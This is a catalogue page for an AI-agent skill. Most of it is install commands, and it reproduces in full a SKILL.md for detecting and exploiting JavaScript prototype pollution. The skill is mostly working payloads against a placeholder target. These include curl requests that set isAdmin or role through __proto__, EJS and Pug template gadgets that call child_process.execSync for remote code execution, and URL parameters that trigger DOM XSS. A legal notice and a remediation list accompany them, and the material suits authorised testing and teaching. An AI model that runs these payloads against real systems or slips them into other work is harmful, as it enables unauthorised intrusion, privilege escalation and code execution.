Code Audit
3stoneBrother/code-audit
Professional code security audit skill covering 55+ vulnerability types.
Agent skill
Detect and exploit JavaScript prototype pollution vulnerabilities on both client-side and server-side applications to achieve XSS, RCE, and authentication bypass through property injection.
$ npx skills add majiayu000/claude-skill-registry --skill exploiting-prototype-pollution-in-javascript -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install majiayu000/claude-skill-registry exploiting-prototype-pollution-in-javascript --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/majiayu000/claude-skill-registry.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/bash/exploiting-prototype-pollution-in-javascript .claude/skills/exploiting-prototype-pollution-in-javascript && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "exploiting-prototype-pollution-in-javascript" agent skill from https://github.com/majiayu000/claude-skill-registry/tree/main/skills/bash/exploiting-prototype-pollution-in-javascript into .claude/skills/exploiting-prototype-pollution-in-javascript/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploiting-prototype-pollution-in-javascript", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/majiayu000/claude-skill-registry/tree/main/skills/bash/exploiting-prototype-pollution-in-javascriptType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add majiayu000/claude-skill-registry --skill exploiting-prototype-pollution-in-javascript -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install majiayu000/claude-skill-registry exploiting-prototype-pollution-in-javascript --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/majiayu000/claude-skill-registry.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/bash/exploiting-prototype-pollution-in-javascript .agents/skills/exploiting-prototype-pollution-in-javascript && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "exploiting-prototype-pollution-in-javascript" agent skill from https://github.com/majiayu000/claude-skill-registry/tree/main/skills/bash/exploiting-prototype-pollution-in-javascript into .agents/skills/exploiting-prototype-pollution-in-javascript/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploiting-prototype-pollution-in-javascript", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add majiayu000/claude-skill-registry --skill exploiting-prototype-pollution-in-javascript -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install majiayu000/claude-skill-registry exploiting-prototype-pollution-in-javascript --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/majiayu000/claude-skill-registry.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/bash/exploiting-prototype-pollution-in-javascript .cursor/skills/exploiting-prototype-pollution-in-javascript && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "exploiting-prototype-pollution-in-javascript" agent skill from https://github.com/majiayu000/claude-skill-registry/tree/main/skills/bash/exploiting-prototype-pollution-in-javascript into .cursor/skills/exploiting-prototype-pollution-in-javascript/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploiting-prototype-pollution-in-javascript", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/majiayu000/claude-skill-registry.git --path skills/bash/exploiting-prototype-pollution-in-javascript--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add majiayu000/claude-skill-registry --skill exploiting-prototype-pollution-in-javascript -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install majiayu000/claude-skill-registry exploiting-prototype-pollution-in-javascript --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/majiayu000/claude-skill-registry.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/bash/exploiting-prototype-pollution-in-javascript .gemini/skills/exploiting-prototype-pollution-in-javascript && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "exploiting-prototype-pollution-in-javascript" agent skill from https://github.com/majiayu000/claude-skill-registry/tree/main/skills/bash/exploiting-prototype-pollution-in-javascript into .gemini/skills/exploiting-prototype-pollution-in-javascript/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploiting-prototype-pollution-in-javascript", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install majiayu000/claude-skill-registry exploiting-prototype-pollution-in-javascriptInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add majiayu000/claude-skill-registry --skill exploiting-prototype-pollution-in-javascript -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/majiayu000/claude-skill-registry.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/bash/exploiting-prototype-pollution-in-javascript .github/skills/exploiting-prototype-pollution-in-javascript && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "exploiting-prototype-pollution-in-javascript" agent skill from https://github.com/majiayu000/claude-skill-registry/tree/main/skills/bash/exploiting-prototype-pollution-in-javascript into .github/skills/exploiting-prototype-pollution-in-javascript/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploiting-prototype-pollution-in-javascript", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add majiayu000/claude-skill-registry --skill exploiting-prototype-pollution-in-javascript -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install majiayu000/claude-skill-registry exploiting-prototype-pollution-in-javascript --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/majiayu000/claude-skill-registry.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/bash/exploiting-prototype-pollution-in-javascript .opencode/skills/exploiting-prototype-pollution-in-javascript && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "exploiting-prototype-pollution-in-javascript" agent skill from https://github.com/majiayu000/claude-skill-registry/tree/main/skills/bash/exploiting-prototype-pollution-in-javascript into .opencode/skills/exploiting-prototype-pollution-in-javascript/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploiting-prototype-pollution-in-javascript", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
exploiting-prototype-pollution-in-javascriptDetect and exploit JavaScript prototype pollution vulnerabilities on both client-side and server-side applications to achieve XSS, RCE, and authentication bypass through property injection.
Exploiting Prototype Pollution In Javascript is an agent skill from majiayu000/claude-skill-registry. Detect and exploit JavaScript prototype pollution vulnerabilities on both client-side and server-side applications to achieve XSS, RCE, and authentication bypass through property injection.
Its SKILL.md is about 2.3k tokens, which your agent loads only when the skill is triggered. The skill folder holds 1 other file (for example `metadata.json`).
It sits in Security, covering Backend development, Web application vulnerabilities and Penetration testing. It works with JavaScript and Bash. The repository describes itself as: Searchable Claude Code skills catalog with source-linked guides and generated registry artifacts. The licence is Apache-2.0.
6 steps, taken from the step headings in SKILL.md.
Read from SKILL.md and the folder at commit 2d14a69. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Shell commands in SKILL.md call:
curlFrom the folder's file list and the shell code blocks in SKILL.md.
No URLs in SKILL.md. Its commands use curl, which can reach the network depending on how they are called.
From URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Exploiting Prototype Pollution In Javascript loads about 2.3k tokens when it runs. Until then it costs about 59 tokens; SKILL.md has 406 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found no risky patterns in SKILL.md.
Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from majiayu000/claude-skill-registry at commit 2d14a69, republished under its Apache-2.0 licence (© majiayu000). 406 words, ~2,262 tokens.
.claude/skills/exploiting-prototype-pollution-in-javascript/SKILL.md (or your agent's skills folder). This skill also uses 1 other file; get the full folder from GitHub.Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
// Client-side: Test URL-based sources
// Navigate to: http://target.com/page?__proto__[polluted]=true
// Or use constructor: http://target.com/page?constructor[prototype][polluted]=true
// Check in browser console:
console.log(({}).polluted); // If returns "true", pollution confirmed
// Common URL-based pollution vectors:
// ?__proto__[key]=value
// ?__proto__.key=value
// ?constructor[prototype][key]=value
// ?constructor.prototype.key=value
// Hash fragment pollution:
// http://target.com/#__proto__[key]=value# Test via JSON body with __proto__
curl -X POST http://target.com/api/merge \
-H "Content-Type: application/json" \
-d '{"__proto__": {"isAdmin": true}}'
# Test via constructor.prototype
curl -X POST http://target.com/api/update \
-H "Content-Type: application/json" \
-d '{"constructor": {"prototype": {"isAdmin": true}}}'
# Test for status code reflection (detection technique)
# Pollute status property to detect server-side pollution
curl -X POST http://target.com/api/merge \
-H "Content-Type: application/json" \
-d '{"__proto__": {"status": 510}}'
# If response returns 510, server-side pollution confirmed
# JSON content type pollution
curl -X POST http://target.com/api/settings \
-H "Content-Type: application/json" \
-d '{"__proto__": {"shell": "/proc/self/exe", "NODE_OPTIONS": "--require /proc/self/environ"}}'// Step 1: Find pollution source (URL parameter, JSON input, postMessage)
// Step 2: Find a gadget - a property read from prototype that reaches a sink
// Common gadgets for DOM XSS:
// innerHTML gadget:
// ?__proto__[innerHTML]=<img/src/onerror=alert(1)>
// jQuery $.html() gadget:
// ?__proto__[html]=<img/src/onerror=alert(1)>
// transport URL gadget (common in analytics scripts):
// ?__proto__[transport_url]=data:,alert(1)//
// Sanitizer bypass via prototype pollution:
// ?__proto__[allowedTags]=<script>
// ?__proto__[tagName]=IMG
// Use DOM Invader (Burp Suite built-in):
// 1. Enable DOM Invader in Burp's embedded browser
// 2. Enable Prototype Pollution option
// 3. Browse application - DOM Invader auto-detects sources
// 4. Click "Scan for gadgets" to find exploitable sinks# Node.js child_process gadget (RCE)
# If application calls child_process.execSync(), spawn(), or fork():
curl -X POST http://target.com/api/merge \
-H "Content-Type: application/json" \
-d '{"__proto__": {"shell": "node", "NODE_OPTIONS": "--require /proc/self/cmdline"}}'
# EJS template engine gadget
curl -X POST http://target.com/api/update \
-H "Content-Type: application/json" \
-d '{"__proto__": {"client": true, "escapeFunction": "JSON.stringify; process.mainModule.require(\"child_process\").execSync(\"id\")"}}'
# Handlebars template gadget
curl -X POST http://target.com/api/merge \
-H "Content-Type: application/json" \
-d '{"__proto__": {"allowProtoMethodsByDefault": true, "allowProtoPropertiesByDefault": true}}'
# Pug template engine gadget
curl -X POST http://target.com/api/data \
-H "Content-Type: application/json" \
-d '{"__proto__": {"block": {"type": "Text", "line": "process.mainModule.require(\"child_process\").execSync(\"id\")"}}}'# Pollute isAdmin or role property
curl -X POST http://target.com/api/profile \
-H "Content-Type: application/json" \
-d '{"__proto__": {"isAdmin": true, "role": "admin"}}'
# Pollute auth-related properties
curl -X POST http://target.com/api/settings \
-H "Content-Type: application/json" \
-d '{"__proto__": {"verified": true, "emailVerified": true}}'
# Bypass JSON schema validation
curl -X POST http://target.com/api/data \
-H "Content-Type: application/json" \
-d '{"__proto__": {"additionalProperties": true}}'# Use ppfuzz for automated detection
ppfuzz -l urls.txt -o results.txt
# Nuclei templates for prototype pollution
echo "http://target.com" | nuclei -t http/vulnerabilities/generic/prototype-pollution.yaml
# Server-side detection with Burp Scanner
# Enable "Server-side prototype pollution" scan check
# Review issues in Burp Dashboard
# Manual detection via timing/error-based techniques
# Pollute a property that causes detectable server behavior change
curl -X POST http://target.com/api/data \
-H "Content-Type: application/json" \
-d '{"__proto__": {"toString": "polluted"}}'
# If server errors (500), pollution is working| Concept | Description |
|---|---|
| Prototype Chain | JavaScript inheritance mechanism where objects inherit from Object.prototype |
| proto | Accessor property that exposes the prototype of an object |
| Pollution Source | Input point that allows setting properties on Object.prototype |
| Pollution Sink | Code that reads a polluted property and performs a dangerous operation |
| Gadget | A property that flows from prototype to a dangerous sink (source-to-sink chain) |
| Deep Merge | Recursive object merge functions that may process proto as a regular key |
| constructor.prototype | Alternative path to access and pollute the prototype object |
| Tool | Purpose |
|---|---|
| DOM Invader | Burp Suite built-in tool for detecting client-side prototype pollution |
| Prototype Pollution Gadgets Scanner | Burp extension for server-side gadget detection |
| ppfuzz | Automated prototype pollution fuzzer |
| Nuclei | Template-based scanner with prototype pollution templates |
| server-side-prototype-pollution | Burp Scanner check for server-side detection |
| ESLint security plugin | Static analysis for prototype pollution patterns in code |
## Prototype Pollution Assessment Report
- **Target**: http://target.com
- **Type**: Server-Side Prototype Pollution
- **Impact**: Remote Code Execution via EJS template gadget
### Findings
| # | Source | Gadget | Sink | Impact |
|---|--------|--------|------|--------|
| 1 | POST /api/merge __proto__ | EJS escapeFunction | Template render | RCE |
| 2 | POST /api/profile __proto__ | isAdmin property | Auth middleware | Privilege Escalation |
| 3 | URL ?__proto__[innerHTML] | innerHTML property | DOM write | Client-Side XSS |
### Remediation
- Use Object.create(null) for configuration objects instead of {}
- Freeze Object.prototype with Object.freeze(Object.prototype)
- Sanitize __proto__ and constructor keys in user input
- Use Map instead of plain objects for user-controlled data
- Update vulnerable npm packages (lodash, merge-deep, etc.)© majiayu000, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
SKILL.md and 1 other file in skills/bash/exploiting-prototype-pollution-in-javascript of majiayu000/claude-skill-registry.
Open the folder on GitHubat commit 2d14a69
We found 1 copy of this SKILL.md (exact, near-identical or edited) in other folders, from 1 other GitHub owner. This page covers the copy in majiayu000/claude-skill-registry, which our catalogue first saw on October 8, 2026.
Exploiting Prototype Pollution In Javascript next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Exploiting Prototype Pollution In Javascript this skillmajiayu000/claude-skill-registry | 666 | 1 repos | ~2.3k | Automated safety check: Pass | Apache-2.0 | |
| Code Audit3stoneBrother/code-audit | 893 | 1 repos | ~2.7k | Automated safety check: Pass | None | |
| Xss TestingNeoTheCapt/RedteamAgent | 142 | — | ~1.4k | Automated safety check: Pass | None | |
| Web Coderboshi-xixixi/TraeSkill | 275 | 1 repos | ~5.2k | Automated safety check: Pass | MIT | |
| Ssrf TestingNeoTheCapt/RedteamAgent | 142 | — | ~768 | Automated safety check: Pass | None | |
| Psalm Security Analysiscachethq/core | 230 | — | ~4.7k | Automated safety check: Pass | Custom licence |
3stoneBrother/code-audit
Professional code security audit skill covering 55+ vulnerability types.
NeoTheCapt/RedteamAgent
Detect and exploit cross-site scripting vulnerabilities in web applications
boshi-xixixi/TraeSkill
Expert 10x engineer with comprehensive knowledge of web development, internet protocols, and web standards.
NeoTheCapt/RedteamAgent
Detect and exploit server-side request forgery to access internal resources and cloud metadata
cachethq/core
Runs and interprets Psalm security (taint) analysis on a Laravel project.
PentesterFlow/agent
Server-Side Template Injection — fingerprint the engine first (Jinja2 / Twig / Velocity / Freemarker / ERB / Smarty / Mako / Handlebars / Pug), then escalate the engine-specific primitive to RCE or…
majiayu000/claude-skill-registry
Multi-source deep research using firecrawl and exa MCPs. An agent skill from majiayu000/claude-skill-registry.
majiayu000/claude-skill-registry
Neural search via Exa MCP for web, code, and company research.
majiayu000/claude-skill-registry
Unified media generation via fal.ai MCP — image, video, and audio.
majiayu000/claude-skill-registry
Interact with Zotero reference management libraries using the pyzotero Python client.
majiayu000/claude-skill-registry
Search scientific papers and retrieve structured experimental data extracted from full-text studies via the BGPT MCP server.
majiayu000/claude-skill-registry
Perform pairwise sequence alignment using Biopython Bio.Align.PairwiseAligner.
Works with
Categories
Detect and exploit JavaScript prototype pollution vulnerabilities on both client-side and server-side applications to achieve XSS, RCE, and authentication bypass through property injection. Exploiting Prototype Pollution In Javascript is an agent skill from majiayu000/claude-skill-registry. Detect and exploit JavaScript prototype pollution vulnerabilities on both client-side and server-side applications to achieve XSS, RCE, and authentication bypass through property injection.
Exploiting Prototype Pollution In Javascript fits situations like: tasks that involve Backend development; tasks that involve Web application vulnerabilities; tasks that involve Penetration testing.
Run `npx skills add majiayu000/claude-skill-registry --skill exploiting-prototype-pollution-in-javascript -a claude-code`. Or copy the skill folder (skills/bash/exploiting-prototype-pollution-in-javascript in majiayu000/claude-skill-registry) into .claude/skills/exploiting-prototype-pollution-in-javascript in your project. Claude Code loads it when a task matches its description.
Run `npx skills add majiayu000/claude-skill-registry --skill exploiting-prototype-pollution-in-javascript -a codex`. Or copy the skill folder (skills/bash/exploiting-prototype-pollution-in-javascript in majiayu000/claude-skill-registry) into .agents/skills/exploiting-prototype-pollution-in-javascript in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add majiayu000/claude-skill-registry --skill exploiting-prototype-pollution-in-javascript -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/exploiting-prototype-pollution-in-javascript, .gemini/skills/exploiting-prototype-pollution-in-javascript, .github/skills/exploiting-prototype-pollution-in-javascript and .opencode/skills/exploiting-prototype-pollution-in-javascript in your project.
Going by SKILL.md and its folder, Exploiting Prototype Pollution In Javascript needs the command-line tools its instructions call (curl). Our summary lists: Node.js.
SKILL.md contains no URLs. Its commands use curl, which can reach the network depending on how they are called. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.
Exploiting Prototype Pollution In Javascript is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.
About 2.3k tokens (SKILL.md is roughly 9k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Exploiting Prototype Pollution In Javascript: Code Audit (3stoneBrother/code-audit, 893 stars), Xss Testing (NeoTheCapt/RedteamAgent, 142 stars), Web Coder (boshi-xixixi/TraeSkill, 275 stars) and Ssrf Testing (NeoTheCapt/RedteamAgent, 142 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
majiayu000 (a GitHub user) maintains it in majiayu000/claude-skill-registry, which has 666 GitHub stars. The repository holds 1,273 skills in this directory. The repository was last updated on October 7, 2026.
Source: majiayu000/claude-skill-registry on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.